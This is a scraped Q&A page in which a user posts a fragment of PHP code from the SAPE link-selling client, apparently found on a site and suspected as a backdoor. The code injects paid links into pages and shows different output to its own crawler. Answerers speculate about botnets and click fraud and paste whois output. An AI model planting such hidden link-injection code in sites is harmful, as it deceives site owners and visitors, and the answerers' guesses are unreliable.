if (preg_match('/' . $sentence . '/', $part) == 1) {
$part = preg_replace('/' . $sentence . '/', str_replace('$', '\$', $this->_words_page[$n]), $part, 1);
if ($this->_debug) {
$debug .= '<!-- ' . $sentence . ' --- ' . $this->_words_page[$n] . ' replaced -->';
}
unset($source_sentences[$n]);
unset($this->_words_page[$n]);
}
}
}
if ($this->_debug) {
$content .= $debug;
$debug = '';
}
if ($first_part) {
$content .= $part;
$first_part = false;
}
else {
$content .= $debug . '<' . $part;
}
unset($part);
$part = strtok('<');
}
$text = ltrim($content);
unset($content);
}
}
else {
if ($this->_debug) {
$debug .= '<!-- No word`s for page -->';
}
}
if ($this->_debug) {
$debug .= '<!-- END: work of replace_in_text_segment() -->';
}
if ($this->_is_our_bot || $this->_force_show_code || $this->_debug) {
$text = '<sape_index>' . $text . '</sape_index>';
if (isset($this->_words['__sape_new_url__']) && strlen($this->_words['__sape_new_url__'])) {
$text .= $this->_words['__sape_new_url__'];
}
}
if ($this->_debug) {
if (count($this->_words_page) > 0) {
$text .= '<!-- Not replaced: ' . "\r\n";
foreach ($this->_words_page as $n => $value) {
$text .= $value . "\r\n\r\n";
}
$text .= '-->';
}
$text .= $debug;
}
return $text;
}
function replace_in_page(&$buffer) {
if (count($this->_words_page) > 0) {
$split_content = preg_split('/(?smi)(<\/?sape_index>)/', $buffer, -1);
$cnt_parts = count($split_content);
if ($cnt_parts > 1) {
//Если есть хоть одна пара sape_index, то начинаем работу
if ($cnt_parts >= 3) {
for ($i = 1; $i < $cnt_parts; $i = $i + 2) {
$split_content[$i] = $this->replace_in_text_segment($split_content[$i]);
}
}
$buffer = implode('', $split_content);
if ($this->_debug) {
$buffer .= '<!-- Split by Sape_index cnt_parts=' . $cnt_parts . '-->';
}
}
else {
$split_content = preg_split('/(?smi)(<\/?body[^>]*>)/', $buffer, -1, PREG_SPLIT_DELIM_CAPTURE);
if (count($split_content) == 5) {
$split_content[0] = $split_content[0] . $split_content[1];
$split_content[1] = $this->replace_in_text_segment($split_content[2]);
$split_content[2] = $split_content[3] . $split_content[4];
unset($split_content[3]);
unset($split_content[4]);
$buffer = $split_content[0] . $split_content[1] . $split_content[2];
if ($this->_debug) {
$buffer .= '<!-- Split by BODY -->';
}
}
else {
if ($this->_debug) {
$buffer .= '<!-- Can`t split by BODY -->';
}
}
}
}
else {
if (!$this->_is_our_bot && !$this->_force_show_code && !$this->_debug) {
$buffer = preg_replace('/(?smi)(<\/?sape_index>)/', '', $buffer);
}
else {
if (isset($this->_words['__sape_new_url__']) && strlen($this->_words['__sape_new_url__'])) {
$buffer .= $this->_words['__sape_new_url__'];
}
}
if ($this->_debug) {
$buffer .= '<!-- No word`s for page -->';
}
}
return $buffer;
}
function _get_db_file() {
if ($this->_multi_site) {
return dirname(__FILE__) . '/' . $this->_host . '.words.db';
}
else {
return dirname(__FILE__) . '/words.db';
}
}
function _get_dispenser_path() {
return '/code_context.php?user=' . _SAPE_USER . '&host=' . $this->_host;
}
function set_data($data) {
$this->_words = $data;
if (#array_key_exists($this->_request_uri, $this->_words) && is_array($this->_words[$this->_request_uri])) {
$this->_words_page = $this->_words[$this->_request_uri];
}
}
}
?>

Sape is apparently link exchange service used by a Russian-speaking botnet owner.
This backdoor appears to use the sape API to download XML and use bots to create a "context" that probably clicks links to generate illicit revenue.
From a bad Google transition of sape.ru:
Sape system increases revenue and reduces the consumption of
webmasters optimizers. Venues are beginning to sell the place, not
only from the main pages, but also internal. How many pages on the
site? Let each revenue. Optimizers are buying cheap internal pages and
save on moving projects.

My Russian isn't very good, but sape.ru looks like some kind of link exchange service. And in answer to your question "Who is SAPE":
[david#archtower ~]$ whois sape.ru
% By submitting a query to RIPN's Whois Service
% you agree to abide by the following terms of use:
% http://www.ripn.net/about/servpol.html#3.2 (in Russian)
% http://www.ripn.net/about/en/servpol.html#3.2 (in English).
domain: SAPE.RU
nserver: ns1.q0.ru.
nserver: ns2.q0.ru.
nserver: ns3.q0.ru.
state: REGISTERED, DELEGATED, VERIFIED
org: LTD Sape
registrar: R01-REG-RIPN
admin-contact: https://partner.r01.ru/contact_admin.khtml
created: 2006.06.20
paid-till: 2013.06.20
free-date: 2013.07.21
source: TCI
Last updated on 2012.06.19 19:28:42 MSK
[david#archtower ~]$

Looks like it's something to automatically visit ads referral links at first glance.

We Keep Coding

PHP, A popular general-purpose scripting language that is especially suited to web development.

PHP go after each link in page and links on links - php

Related

How to avoid url with mailto:

Function inside an array php

php convert absolute URL containing relative paths in absolute url without relative path

PHP script to extract artist & title from Shoutcast/Icecast stream

Hacker Backdoor script? [closed]

Categories

Resources